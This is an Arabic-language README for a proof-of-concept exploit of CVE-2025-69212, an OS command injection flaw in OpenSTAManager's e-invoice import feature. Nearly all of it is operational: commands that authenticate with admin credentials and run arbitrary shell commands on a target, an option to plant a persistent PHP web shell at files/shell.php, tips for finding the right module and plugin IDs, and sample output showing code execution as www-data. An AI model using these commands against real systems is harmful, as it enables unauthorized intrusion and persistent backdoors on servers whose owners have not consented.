
CVE-2025-69212 - PoC لحقن أوامر نظام التشغيل في OpenSTAManager
تثبيت التبعيات:
pip install -r requirements.txt
تشغيل أمر واحد وعرض مخرجه:
python3 cve-2025-69212_poc.py -u http://target.com -U admin -P 'password' -c 'id'
بدلاً من ذلك، قم بزرع قشرة ويب PHP دائمة:
python3 cve-2025-69212_poc.py -u http://target.com -U admin -P 'password' --shell
| الخيار | الوصف |
|---|---|
-u, --url | عنوان URL الأساسي للمثيل المستهدف |
-U, --username | اسم المستخدم للمصادقة |
-P, --password | كلمة المرور للمصادقة |
-c, --command | الأمر المراد تنفيذه، ويُحفظ مخرجه في pwn_out.txt |
--shell | زرع قشرة ويب PHP في files/shell.php بدلاً من تشغيل أمر واحد |
--id-module | معرّف الوحدة لميزة استيراد الفواتير (الافتراضي: 14) |
--id-plugin | معرّف الإضافة لميزة استيراد الفواتير (الافتراضي: 48) |
تُعد id_module وid_plugin خاصين بكل مثيل. إذا لم تعمل القيم الافتراضية، فسجّل الدخول إلى واجهة الويب الخاصة بالهدف، وانتقل إلى ميزة استيراد الفواتير الإلكترونية، وتحقق من معاملات الطلب في تبويب الشبكة في متصفحك.
$ python3 cve-2025-69212_poc.py -u http://target.com -U admin -P 'password' -c 'id'
[*] Logging in as admin ...
[+] Authenticated.
[*] Building payload to run: id
[*] Uploading exploit ZIP to id_module=14 id_plugin=48 ...
[*] Server responded: HTTP 500 (500 after command execution is expected)
[*] Fetching command output from http://target.com/files/pwn_out.txt ...
[+] Command output:
--------------------------------------------------
uid=33(www-data) gid=33(www-data) groups=33(www-data)
--------------------------------------------------